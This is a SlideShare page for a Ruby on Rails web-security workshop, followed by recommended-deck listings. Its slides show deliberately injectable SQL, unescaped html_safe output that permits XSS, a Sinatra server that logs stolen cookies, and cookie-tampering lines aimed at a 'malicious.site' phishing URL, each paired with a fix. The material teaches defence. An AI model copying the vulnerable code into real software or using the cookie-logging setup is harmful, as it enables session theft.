RoR Workshop - Web applications hacking - Ruby on Rails example
1 like1,886 views
The document discusses web application security, specifically focusing on Ruby on Rails vulnerabilities like SQL injection and XSS attacks, along with best practices for prevention. It emphasizes the importance of sanitizing user inputs, securing APIs, and obtaining code reviews to mitigate risks. Furthermore, it outlines common pitfalls related to CSRF attacks and sensitive data exposure, providing strategies to enhance application security.
1 of 65
Download to read offline
![# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by title: params[:title]
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-15-320.jpg)
![# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
def show
@thread = ForumThread.find_by “title = #{params[:title]}”
end
end
# config/routes.rb
resources :forum_threads, param: :title, only: :show do
resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-17-320.jpg)
![# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content
COMMENTS - create and show:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-24-320.jpg)
![# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= comment.content.html_safe
COMMENTS - create and show:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-26-320.jpg)
![require ‘sinatra’
require ‘logger’
logger = Logger.new ‘log/cookies.log’
get ‘/cookies/:cookie’ do
logger.info ‘=== COOKIE ===’
logger.info params[:cookie]
logger.info ‘/== COOKIE ===’
end
XSS ATTACK - SIMPLE COOKIES LOGGING SERVER](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-29-320.jpg)
![cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’
// document.cookies=”after_sign_in_path=’http://malicious.site/phishing’”
cookies.signed[:after_sign_in_path] = {
value: ‘http://localhost/after_sign_in_path’,
httponly: true
}
// finally safe
UNFORTUNATELY - NO. ALWAYS USE THIS HASH!](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-33-320.jpg)
![# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
def create
@thread = ForumThread.find params[:forum_thread_id]
@comments = @thread.comments.build comment_params
@comments.user = current_user
if @comment.save
redirect_to @thread, notice: ‘Successfully added new comment’
else
redirect_to @thread, alert: “Couldn’t save comment“
end
end
private
def comment_params
params.require(:comment).permit(:content)
end
end
# app/views/forum_threads/show.haml
%p= sanitize comment.content.html_safe
COMMENTS - create and show:](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-35-320.jpg)
![[
{
”id”: 2,
”title”: "Curabitur vel vulputate libero.",
”created_at”: "2016-04-18T10:10:40.648Z",
”updated_at”: "2016-04-18T10:10:40.648Z"
},
{
"id": 1,
"title": "Lorem ipsum dolor sit amet.",
"created_at": "2016-04-18T10:10:40.607Z",
"updated_at": "2016-04-18T10:10:40.607Z"
}
]
GENERATED RAILS API - OUTPUT](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-57-320.jpg)
![[
{
”title”: "Curabitur vel vulputate libero."
},
{
"title": "Lorem ipsum dolor sit amet."
}
]
GENERATED RAILS API - SECURED OUTPUT](https://image.slidesharecdn.com/krakyournet2016-hackingrubyonrailsforum-160421122153/85/RoR-Workshop-Web-applications-hacking-Ruby-on-Rails-example-59-320.jpg)
Recommended
A Case Study of Using Selenium IDE and WebDriver_Word Doc
A Case Study of Using Selenium IDE and WebDriver_Word DocJabeen Shazia Posses H1 B Visa (Jazz) This document discusses Selenium testing tools and provides a case study on using Selenium IDE and WebDriver to test an online voting system. It describes the tools in Selenium including Selenium IDE, WebDriver, and Grid. It then discusses testing an online voting system to ensure it works properly for registration, login, and voting. Several test cases executed against the system are presented. Finally, the advantages and disadvantages of Selenium IDE and WebDriver are outlined.
SRE-iously! Defining the Principles, Habits, and Practices of Site Reliabilit...
SRE-iously! Defining the Principles, Habits, and Practices of Site Reliabilit...Tori Wieldt The document discusses the principles, habits, and practices of site reliability engineering (SRE) at New Relic. It describes New Relic's transition from a monolithic architecture with siloed teams to a microservices architecture with 200+ services and embedded SREs on engineering teams. The goals of SREs at New Relic are to continuously improve the reliability of their platform through two main roles: "pure" SREs who build core platforms and embedded SREs who partner with engineering teams. SREs focus on three spheres: stability, reliability, and engineering.
Postman
PostmanIgor Shubovych Postman is an API development tool that allows users to design, manage, run, test, document, and share APIs. It provides features like request building, documentation, environments, test automation, and collaboration. Alternatives include Paw, Insomnia, command line tools like cURL, and services from Apigee and Apiary. The document recommends using any tool that helps share APIs, especially for complex projects and team collaboration.
Selenium with java
Selenium with javaGousalya Ramachandran The document provides an overview of Selenium with Java, emphasizing the importance of automation in testing and the role of manual testing. It details various Selenium tools like WebDriver, IDE, and Grid, explaining their features and installation steps, along with basic commands for navigating and interacting with web applications. It also covers wait commands, assertions, and a simple code example of using Selenium with Java to perform web automation tasks.
Salesforce asynchronous apex
Salesforce asynchronous apexBadan Singh Pundeer When executing something synchronously, you wait for it to finish before moving on to another task. Asynchronously, you can move on before it finishes. Future methods, Queueable Apex, and Batch Apex allow asynchronous execution in Apex. Future methods are best for long-running methods or callouts. Queueable Apex allows job chaining and passing complex types. Batch Apex is best for large data volumes processed in batches. Continuations allow asynchronous callouts from Visualforce pages.
Selenium interview questions
Selenium interview questionsgirichinna27 This document discusses Selenium interview questions and answers. It begins with questions about what Selenium is, its main components, and Selenium IDE. Subsequent questions cover Selenium RC, Grid, supported browsers and languages. The document also includes explanations of concepts like assertions, accessors, and how to perform various tasks in Selenium IDE like inserting breakpoints, exporting tests, and debugging tests.
Complete guide to manual testing@uma
Complete guide to manual testing@umaUma Sapireddy The document provides information about manual testing processes and concepts. It discusses various phases of the software development life cycle (SDLC) like requirements gathering, analysis, design, coding, testing, and deployment. It also describes different testing methodologies like black box testing, white box testing, different levels of testing from unit to user acceptance. Key terms discussed include environments, stubs, drivers, and software development process models like waterfall.
Online Real Estate Management System
Online Real Estate Management Systemshahrukh Nawandish This document describes an online real estate management system project. The system allows owners to list properties online and potential tenants or buyers to search listings. It provides a platform for owners and customers to communicate directly. The system is designed with separate modules for administrators, owners, and customers. It uses a three-tier architecture with ASP.NET for the front end, MS SQL Server for the back end, and is designed using an agile methodology. Tables were created to store user, property, and other relevant data. The system was tested to ensure requirements were met before launch.
Automation frameworks
Automation frameworksVishwanath KC The document outlines the benefits and types of automation testing, comparing manual testing with automated processes. It details various testing frameworks, including linear, modular, data-driven, keyword-driven, and hybrid models, along with their respective pros and cons. Additionally, it emphasizes the efficiency and effectiveness gained through automation in software testing while maintaining flexibility in managing test cases and data.
Overview of Site Reliability Engineering (SRE) & best practices
Overview of Site Reliability Engineering (SRE) & best practicesAshutosh Agarwal The document discusses the balance between launching new features quickly while maintaining system reliability, emphasizing the role of Site Reliability Engineers (SREs) in supporting product teams. It outlines the importance of monitoring, establishing Service Level Indicators (SLIs) and Service Level Objectives (SLOs), and employing playbooks for incident management. Additionally, it promotes a culture that avoids reliance on individual heroes through structured postmortems, progressive rollouts, and effective contingency planning.
An Introduction To Automated API Testing
An Introduction To Automated API TestingSauce Labs The document outlines an automated API testing presentation featuring Patrick Poulin and Simone Pezzano from API Fortress. It covers key topics such as API definitions, testing best practices, popular tools for automation, and a walkthrough of both Postman and API Fortress. Key takeaways emphasize the importance of testing everything with dynamic data and integration tests to ensure accuracy and functionality.
NashTech - Azure Application Insights
NashTech - Azure Application InsightsPhi Huynh This document provides an overview of Application Insights and how it can be used to monitor Azure services. It discusses key Application Insights features like performance tracing, alerts, and workbooks. It also covers how Application Insights integrates with tools like Visual Studio and VSTS. The document concludes with a brief discussion of pricing and some limitations.
How to Automate API Testing
How to Automate API TestingBruno Pedro The document discusses automating API testing, covering unit testing, functional testing, and API exploration. It outlines the processes, tools, and execution methods involved in each testing type while emphasizing the importance of automated tests and local testing. The conclusion highlights the significance of effective communication regarding API changes for providers.
HP ALM
HP ALMRajathi-QA The document outlines a training agenda for HP ALM, a web-based tool for managing the application lifecycle, including project planning, requirement gathering, and defect tracking. It covers key topics such as the architecture of ALM, workflow processes, test execution methodologies, and site administration roles. Additionally, it highlights the importance of requirements definition, test closure activities, and milestone management within the software development lifecycle.
Real Estate
Real Estate Smit Patel This document describes a proposed real estate website project. The project aims to create a website that allows users to buy and sell properties online. Key features would include user registration and login, property listing and search functionality, and the ability to display property details and photos. The system is intended to reduce time and effort compared to a manual real estate process. Technical details like database structure, programming tools, and screen designs are provided.
HP ALM QC
HP ALM QCFayis-QA The document outlines the training agenda for HP ALM (Application Lifecycle Management) focusing on quality assurance and software testing. It covers the core functionalities of HP ALM, including project management, requirement specifications, test plan creation, and test lab execution. Additionally, it provides step-by-step instructions for creating requirements, test cases, and executing tests within the ALM framework.
Postman. From simple API test to end to end scenario
Postman. From simple API test to end to end scenarioHYS Enterprise The document discusses Postman, a tool for testing APIs. It provides an overview of APIs and common API implementation approaches like SOAP and REST. It also demonstrates how Postman can be used to test APIs by creating workflows to send requests and validate responses using features like environments, variables, assertions and data-driven tests.
Static Testing
Static Testing Suraj Vishwakarma Static testing involves examining a program's code and documentation without executing the code. It aims to improve quality by finding errors early. Techniques include informal reviews with minimal documentation; formal reviews following steps like planning, preparation, and follow-up; technical reviews of specifications; walkthroughs where authors explain work; and inspections led by moderators. Static testing allows early feedback but cannot find runtime issues and is time-consuming.
Automate REST API Testing
Automate REST API TestingTechWell Eric Smith, an Agile evangelist with extensive experience in software delivery, presents on automating REST API testing. He discusses the importance of a structured approach to testing, methods for automation, and the need for developers to integrate tests into the build process to ensure reliability. The session highlights tools and techniques for effective API testing and the challenges of coordination among teams in a service-oriented architecture.
Chaos engineering
Chaos engineering Alberto Acerbis Chaos engineering involves experimenting with failures and turbulent conditions in a production system to build resilience. As systems become more distributed and complex, failures have become harder to predict. Chaos engineering embraces failure to discover weaknesses and prevent outages. It involves conducting controlled experiments to explore a system's behavior under different conditions. The goal is to validate system reliability and identify areas for improvement before real failures occur.
GraphQL Security
GraphQL SecurityShiu-Fun Poon The document discusses GraphQL as a query language that allows users to specify the exact data they need from a single endpoint, contrasting it with REST. It outlines various security considerations such as transport protection, rate limiting, data leakage, authentication methods, and authorization strategies. Additionally, it highlights the need for careful management of query complexity and compliance with regulations like GDPR and PCI compliance.
Test Case Design and Technique
Test Case Design and TechniqueANKUR-BA The document outlines various techniques for test case design in software testing, including both black-box and white-box methods. It covers techniques like equivalence partitioning, boundary value analysis, cause-effect graphing, and path testing, emphasizing the significance of structured test cases for identifying software defects. Additional methodologies such as behavior testing and random testing are discussed, providing a comprehensive guide on effective test case strategies.
Web application security & Testing
Web application security & TestingDeepu S Nath This document summarizes web application security testing. It discusses understanding how web applications work and common security risks. It then outlines the main steps of a security test: information gathering, configuration management testing, authentication testing, authorization testing, business logic testing, data validation testing, and denial of service testing. Specific techniques are provided for each step like using tools like Nikto, ZAP, and Hydra or manually testing authentication, injections, error handling, and more.
Shift left
Shift leftpenetration Tester Shift left testing involves moving testing as far left or as early in the development process as possible to find and prevent defects early. This is opposed to traditional testing, which only occurred right before release. Shift left testing improves quality by identifying issues early when they are cheaper to fix. While shift left is often best, shift right testing post-production may also be useful in some cases to enhance customer experience and ensure proper test coverage and automation. To shift left, organizations can engage stakeholders early, do static testing of requirements and design, and see benefits like increased automation, delivery speed, and satisfaction.
Unit and integration Testing
Unit and integration TestingDavid Berliner This document discusses unit and integration testing. It begins by explaining the benefits of testing, such as reducing bugs and allowing safe refactoring. It then describes different types of tests like unit, integration, and database tests. The document focuses on unit testing, explaining how to write and organize unit tests using PHPUnit. It provides examples of test assertions and annotations. It also covers mocking and stubbing dependencies. Finally, it discusses challenges like testing code that relies on external components and provides strategies for database testing.
API Testing
API TestingBikash Sharma API testing verifies the functionality, usability, security, and performance of application programming interfaces (APIs). Key aspects to test include input parameters, error handling, response times, authentication, and documentation. Automated testing scripts should be created to regularly test APIs for bugs such as unhandled errors, security vulnerabilities, incorrect responses, and reliability issues. Thorough API testing requires considering parameter combinations, output validation across systems, and exception handling.
End-to-End Test Automation for Both Horizontal and Vertical Scale
End-to-End Test Automation for Both Horizontal and Vertical ScaleErdem YILDIRIM The document provides an overview of end-to-end (E2E) test automation, discussing its definition, advantages for both vertical and horizontal scale, and the strategy for implementing test automation. It emphasizes the necessity for both manual and automated testing while detailing the challenges faced in automation, such as training and tool selection. Lastly, the document shares experiences from various projects, highlighting the return on investment and efficiency gained through automated testing.
Chapter 7 software reliability
Chapter 7 software reliabilitydespicable me The document discusses concepts related to software reliability. It describes how software reliability is modeled using a "bathtub curve" with two phases - an initial high failure rate period and a useful life period with an approximately constant failure rate. The document defines software reliability and discusses factors that influence it like faults in the software and the execution environment. It also outlines various ways of characterizing software failures over time and presents models of failure probability distributions. Finally, it discusses uses of reliability studies and defines software quality in terms of attributes like reliability, correctness and maintainability.
Smartwatch - something more than an additional screen for notifications?
Smartwatch - something more than an additional screen for notifications?Railwaymen This document outlines the development of a smartwatch application for Tizen and an accompanying Android application for managing kitchen operations. It details the architectures, libraries, and functionalities of both apps, including communication via a REST API and Pusher service for real-time updates. The project, part of a software house in Krakow, is designed to streamline kitchen processes and enhance waiter interactions.
40 Tools in 20 Minutes. Hacking Your Marketing Career
40 Tools in 20 Minutes. Hacking Your Marketing CareerEvgeny Tsarkov The document lists various tools and applications useful for enhancing marketing careers, including web applications, desktop applications, email tools, mobile apps, and learning platforms. Specific tools mentioned include Zapier, Google URL Builder, and learning resources like Codecademy. It emphasizes the importance of utilizing these tools for effective marketing strategies.
More Related Content
What's hot (20)
Automation frameworks
Automation frameworksVishwanath KC The document outlines the benefits and types of automation testing, comparing manual testing with automated processes. It details various testing frameworks, including linear, modular, data-driven, keyword-driven, and hybrid models, along with their respective pros and cons. Additionally, it emphasizes the efficiency and effectiveness gained through automation in software testing while maintaining flexibility in managing test cases and data.
Overview of Site Reliability Engineering (SRE) & best practices
Overview of Site Reliability Engineering (SRE) & best practicesAshutosh Agarwal The document discusses the balance between launching new features quickly while maintaining system reliability, emphasizing the role of Site Reliability Engineers (SREs) in supporting product teams. It outlines the importance of monitoring, establishing Service Level Indicators (SLIs) and Service Level Objectives (SLOs), and employing playbooks for incident management. Additionally, it promotes a culture that avoids reliance on individual heroes through structured postmortems, progressive rollouts, and effective contingency planning.
An Introduction To Automated API Testing
An Introduction To Automated API TestingSauce Labs The document outlines an automated API testing presentation featuring Patrick Poulin and Simone Pezzano from API Fortress. It covers key topics such as API definitions, testing best practices, popular tools for automation, and a walkthrough of both Postman and API Fortress. Key takeaways emphasize the importance of testing everything with dynamic data and integration tests to ensure accuracy and functionality.
NashTech - Azure Application Insights
NashTech - Azure Application InsightsPhi Huynh This document provides an overview of Application Insights and how it can be used to monitor Azure services. It discusses key Application Insights features like performance tracing, alerts, and workbooks. It also covers how Application Insights integrates with tools like Visual Studio and VSTS. The document concludes with a brief discussion of pricing and some limitations.
How to Automate API Testing
How to Automate API TestingBruno Pedro The document discusses automating API testing, covering unit testing, functional testing, and API exploration. It outlines the processes, tools, and execution methods involved in each testing type while emphasizing the importance of automated tests and local testing. The conclusion highlights the significance of effective communication regarding API changes for providers.
HP ALM
HP ALMRajathi-QA The document outlines a training agenda for HP ALM, a web-based tool for managing the application lifecycle, including project planning, requirement gathering, and defect tracking. It covers key topics such as the architecture of ALM, workflow processes, test execution methodologies, and site administration roles. Additionally, it highlights the importance of requirements definition, test closure activities, and milestone management within the software development lifecycle.
Real Estate
Real Estate Smit Patel This document describes a proposed real estate website project. The project aims to create a website that allows users to buy and sell properties online. Key features would include user registration and login, property listing and search functionality, and the ability to display property details and photos. The system is intended to reduce time and effort compared to a manual real estate process. Technical details like database structure, programming tools, and screen designs are provided.
HP ALM QC
HP ALM QCFayis-QA The document outlines the training agenda for HP ALM (Application Lifecycle Management) focusing on quality assurance and software testing. It covers the core functionalities of HP ALM, including project management, requirement specifications, test plan creation, and test lab execution. Additionally, it provides step-by-step instructions for creating requirements, test cases, and executing tests within the ALM framework.
Postman. From simple API test to end to end scenario
Postman. From simple API test to end to end scenarioHYS Enterprise The document discusses Postman, a tool for testing APIs. It provides an overview of APIs and common API implementation approaches like SOAP and REST. It also demonstrates how Postman can be used to test APIs by creating workflows to send requests and validate responses using features like environments, variables, assertions and data-driven tests.
Static Testing
Static Testing Suraj Vishwakarma Static testing involves examining a program's code and documentation without executing the code. It aims to improve quality by finding errors early. Techniques include informal reviews with minimal documentation; formal reviews following steps like planning, preparation, and follow-up; technical reviews of specifications; walkthroughs where authors explain work; and inspections led by moderators. Static testing allows early feedback but cannot find runtime issues and is time-consuming.
Automate REST API Testing
Automate REST API TestingTechWell Eric Smith, an Agile evangelist with extensive experience in software delivery, presents on automating REST API testing. He discusses the importance of a structured approach to testing, methods for automation, and the need for developers to integrate tests into the build process to ensure reliability. The session highlights tools and techniques for effective API testing and the challenges of coordination among teams in a service-oriented architecture.
Chaos engineering
Chaos engineering Alberto Acerbis Chaos engineering involves experimenting with failures and turbulent conditions in a production system to build resilience. As systems become more distributed and complex, failures have become harder to predict. Chaos engineering embraces failure to discover weaknesses and prevent outages. It involves conducting controlled experiments to explore a system's behavior under different conditions. The goal is to validate system reliability and identify areas for improvement before real failures occur.
GraphQL Security
GraphQL SecurityShiu-Fun Poon The document discusses GraphQL as a query language that allows users to specify the exact data they need from a single endpoint, contrasting it with REST. It outlines various security considerations such as transport protection, rate limiting, data leakage, authentication methods, and authorization strategies. Additionally, it highlights the need for careful management of query complexity and compliance with regulations like GDPR and PCI compliance.
Test Case Design and Technique
Test Case Design and TechniqueANKUR-BA The document outlines various techniques for test case design in software testing, including both black-box and white-box methods. It covers techniques like equivalence partitioning, boundary value analysis, cause-effect graphing, and path testing, emphasizing the significance of structured test cases for identifying software defects. Additional methodologies such as behavior testing and random testing are discussed, providing a comprehensive guide on effective test case strategies.
Web application security & Testing
Web application security & TestingDeepu S Nath This document summarizes web application security testing. It discusses understanding how web applications work and common security risks. It then outlines the main steps of a security test: information gathering, configuration management testing, authentication testing, authorization testing, business logic testing, data validation testing, and denial of service testing. Specific techniques are provided for each step like using tools like Nikto, ZAP, and Hydra or manually testing authentication, injections, error handling, and more.
Shift left
Shift leftpenetration Tester Shift left testing involves moving testing as far left or as early in the development process as possible to find and prevent defects early. This is opposed to traditional testing, which only occurred right before release. Shift left testing improves quality by identifying issues early when they are cheaper to fix. While shift left is often best, shift right testing post-production may also be useful in some cases to enhance customer experience and ensure proper test coverage and automation. To shift left, organizations can engage stakeholders early, do static testing of requirements and design, and see benefits like increased automation, delivery speed, and satisfaction.
Unit and integration Testing
Unit and integration TestingDavid Berliner This document discusses unit and integration testing. It begins by explaining the benefits of testing, such as reducing bugs and allowing safe refactoring. It then describes different types of tests like unit, integration, and database tests. The document focuses on unit testing, explaining how to write and organize unit tests using PHPUnit. It provides examples of test assertions and annotations. It also covers mocking and stubbing dependencies. Finally, it discusses challenges like testing code that relies on external components and provides strategies for database testing.
API Testing
API TestingBikash Sharma API testing verifies the functionality, usability, security, and performance of application programming interfaces (APIs). Key aspects to test include input parameters, error handling, response times, authentication, and documentation. Automated testing scripts should be created to regularly test APIs for bugs such as unhandled errors, security vulnerabilities, incorrect responses, and reliability issues. Thorough API testing requires considering parameter combinations, output validation across systems, and exception handling.
End-to-End Test Automation for Both Horizontal and Vertical Scale
End-to-End Test Automation for Both Horizontal and Vertical ScaleErdem YILDIRIM The document provides an overview of end-to-end (E2E) test automation, discussing its definition, advantages for both vertical and horizontal scale, and the strategy for implementing test automation. It emphasizes the necessity for both manual and automated testing while detailing the challenges faced in automation, such as training and tool selection. Lastly, the document shares experiences from various projects, highlighting the return on investment and efficiency gained through automated testing.
Chapter 7 software reliability
Chapter 7 software reliabilitydespicable me The document discusses concepts related to software reliability. It describes how software reliability is modeled using a "bathtub curve" with two phases - an initial high failure rate period and a useful life period with an approximately constant failure rate. The document defines software reliability and discusses factors that influence it like faults in the software and the execution environment. It also outlines various ways of characterizing software failures over time and presents models of failure probability distributions. Finally, it discusses uses of reliability studies and defines software quality in terms of attributes like reliability, correctness and maintainability.
Viewers also liked (8)
Smartwatch - something more than an additional screen for notifications?
Smartwatch - something more than an additional screen for notifications?Railwaymen This document outlines the development of a smartwatch application for Tizen and an accompanying Android application for managing kitchen operations. It details the architectures, libraries, and functionalities of both apps, including communication via a REST API and Pusher service for real-time updates. The project, part of a software house in Krakow, is designed to streamline kitchen processes and enhance waiter interactions.
40 Tools in 20 Minutes. Hacking Your Marketing Career
40 Tools in 20 Minutes. Hacking Your Marketing CareerEvgeny Tsarkov The document lists various tools and applications useful for enhancing marketing careers, including web applications, desktop applications, email tools, mobile apps, and learning platforms. Specific tools mentioned include Zapier, Google URL Builder, and learning resources like Codecademy. It emphasizes the importance of utilizing these tools for effective marketing strategies.
CyberLab CCEH Session -13 Hacking Web Applications
CyberLab CCEH Session -13 Hacking Web ApplicationsCyberLab This document appears to be the title slide for a presentation on hacking web applications. The main title is "Hacking Web Applications" and the subtitle provides the website "www.CyberLabZone.com" where additional information can be found. The document also includes session information for session 13.
Web Application Hacking
Web Application HackingSensePost The document discusses vulnerabilities in web applications and the importance of securing them, highlighting various attack methods such as directory traversal, SQL injection, and cross-site scripting. It emphasizes the necessity of proper input sanitization and the complexities involved in web application testing and automation. SensePost, the company mentioned, focuses on information security and aims to improve web application security practices.
Learning by hacking - android application hacking tutorial
Learning by hacking - android application hacking tutorialLandice Fu The document is a tutorial on Android application hacking by Landice Fu, covering concepts such as Java knowledge, Android app design, and using tools like apktool and smali. It emphasizes responsible usage for educational purposes and includes techniques for localization, decompiling, and reverse engineering. The content also highlights strategies for protecting applications against hacking and provides insights into modifying applications.
Chapter 8 - Main Memory
Chapter 8 - Main MemoryWayne Jones Jnr Chapter 8 discusses various memory management techniques such as swapping, paging, and segmentation, detailing how processes are managed in memory. It covers the concepts of logical and physical address space, dynamic memory allocation methods, and the impact of fragmentation on memory utilization. The chapter also provides an overview of the Intel Pentium architecture, which supports both segmentation and paging for effective memory management.
Operation System
Operation SystemROHINIPRIYA1997 The document discusses various aspects of disk storage and organization in computer systems. It describes how disks are logically organized into blocks and mapped onto physical sectors. Different disk scheduling algorithms like FCFS, SSTF, SCAN, and C-SCAN are covered that aim to optimize disk head movement and request servicing time. The document also discusses disk formatting, swap space management in operating systems, and the architecture and subsystems of the Windows 2000 operating system.
40 Tools in 20 Minutes: Hacking your Marketing Career
40 Tools in 20 Minutes: Hacking your Marketing CareerEric Leist The document lists various tools across categories like web applications, desktop applications, email tools, mobile apps, and learning platforms that can aid in marketing and productivity. It includes services for social media automation, email tracking, design resources, A/B testing, and educational resources for learning coding and analytics. Each tool is accompanied by its purpose and a link for further information.
Similar to RoR Workshop - Web applications hacking - Ruby on Rails example (20)
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Anna Klepacka The document outlines a software house based in Krakow specializing in Ruby on Rails and mobile applications, detailing its history and recognition in the industry. It discusses common web application vulnerabilities according to OWASP Top 10, provides code snippets for a Ruby on Rails forum application, and highlights best practices for securing APIs and user inputs. Key takeaways include the importance of sanitizing outputs, reviewing code, and understanding authentication and session management to prevent security issues.
Ruby on Rails Penetration Testing
Ruby on Rails Penetration Testing3S Labs This document discusses breaking and penetration testing Ruby on Rails applications. It covers fingerprinting the Rails framework, testing the attack surface through routes, session security issues, authentication vulnerabilities, authorization testing, CSRF protection bypass, model attribute assignment and SQL injection issues, view rendering exploits, and insecure defaults. Recommended tools for analysis include Brakeman, grep searches, and the Ruby Mechanize and Nokogiri libraries. The document provides references for further Rails security best practices.
Rails Security
Rails SecurityJonathan Weiss This document summarizes best practices for securing Rails applications. It discusses potential information leaks from server headers, status pages, and Subversion metadata. It also covers vulnerabilities like cookie session storage, cross-site scripting (XSS), session fixation, cross-site request forgery (CSRF), SQL injection, and JavaScript hijacking. The document provides recommendations to address each issue, such as disabling server headers, preventing .svn access, using secure session storage, sanitizing user input, resetting sessions after login, validating CSRF tokens, and escaping values in SQL queries.
Ruby on Rails Security
Ruby on Rails SecurityJonathan Weiss The document, presented by Jonathan Weiss, discusses various security aspects of Ruby on Rails, including setup vulnerabilities, session management, cross-site scripting, and denial of service attacks. It emphasizes the importance of following best practices and employing security measures like HTML sanitization and CSRF protection. Despite Rails having built-in security features, proper configuration and awareness of potential threats are crucial for developers.
Ruby on Rails Security
Ruby on Rails Securityamiable_indian This document summarizes common Ruby on Rails security issues and best practices for addressing them. It covers potential information leaks from application setup and deployment, cross-site scripting vulnerabilities from unsanitized user input, session fixation issues, cross-site request forgery problems, SQL injection protection, preventing JavaScript hijacking, securing mass assignment, and security risks related to third-party Rails plugins. The document provides explanations of each issue and recommendations for configuration and code changes to enhance the security of Rails applications.
Ruby on-rails-security
Ruby on-rails-securityPhong Nguyễn Đình Jonathan Weiss presented on Ruby on Rails security. He discussed potential vulnerabilities in Rails application setup and deployment, application code, and the Rails framework. He highlighted information leaks, SQL injection, cross-site scripting (XSS), session fixation, cross-site request forgery (CSRF), mass assignment, and denial of service attacks as specific security risks and provided best practices for mitigating each one.
Rails Security
Rails SecurityWen-Tien Chang Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
Ruby On Rails Security 9984
Ruby On Rails Security 9984Dr Rushi Raval This document discusses security considerations for Ruby on Rails applications. It covers common vulnerabilities like cross-site scripting, SQL injection, session hijacking, and denial of service attacks. It provides recommendations to prevent these issues, such as sanitizing user input, using prepared statements, resetting sessions after login, and offloading static assets. The document emphasizes that Rails has built-in protections but is not inherently secure, and developers must still implement secure coding practices.
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff Louis Nyffenegger gave a talk about the recent vulnerabilities discovered in Ruby on Rails. Several vulnerabilities allowed remote code execution by injecting malicious YAML payloads that were parsed by Rails. These issues arose due to assumptions that Rails was secure, increased scrutiny as its popularity grew, and its flexible parsing of requests. Upgrades and removing unnecessary parsers can help mitigate risks going forward.
Defending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal The document outlines key security principles for web applications built with Rails, emphasizing the importance of server-side validation, proper password management through hashing and salting, and safeguarding against session hijacking, CSRF, XSS, and SQL injection. It provides practical examples and mitigations for each type of attack, highlighting best practices such as using RESTful authentication and escaping user input to enhance security. Additionally, it stresses the need for strong password policies and the risks associated with using weak passwords.
Ruby on Rails Security Guide
Ruby on Rails Security Guideihji The Ruby on Rails security guide outlines critical safety practices for managing sessions, preventing session hijacking, and countering cross-site request forgery (CSRF) attacks. It emphasizes the importance of secure session management, including secret keys and SSL configurations, while also addressing various injection attacks such as SQL injection and cross-site scripting (XSS). The document provides practical countermeasures to enhance web application security, including input validation, output escaping, and using safe coding practices.
Ruby Security
Ruby SecuritySHC The document discusses common web application security issues like session hijacking, cross-site request forgery (CSRF), SQL injection, and cross-site scripting (XSS). It explains how sessions work in web applications and vulnerabilities associated with them. The document also provides examples of SQL injection and discusses how frameworks like Ruby on Rails have built-in protections against common attacks through helper methods.
Pentesting for startups
Pentesting for startupslevigross Pentesting for startups is a presentation about security vulnerabilities in Django and Rails web frameworks. The document discusses information disclosure issues from exceptions, default settings, and insecure code practices. It also covers session hijacking, XSS, CSRF, HTTP parameter poisoning, SQL injection, password storage weaknesses, and denial of service attacks. The presenter advocates for careful input validation, secure default configurations, and defense-in-depth practices to mitigate risks.
Security on Rails
